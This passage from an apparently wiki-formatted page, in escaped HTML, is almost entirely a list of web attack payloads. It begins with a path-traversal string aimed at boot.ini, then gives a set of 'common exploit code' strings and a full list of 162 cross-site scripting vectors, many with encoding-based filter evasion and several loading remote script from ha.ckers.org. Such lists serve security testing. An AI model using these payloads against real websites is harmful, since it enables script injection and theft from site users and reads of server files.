/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
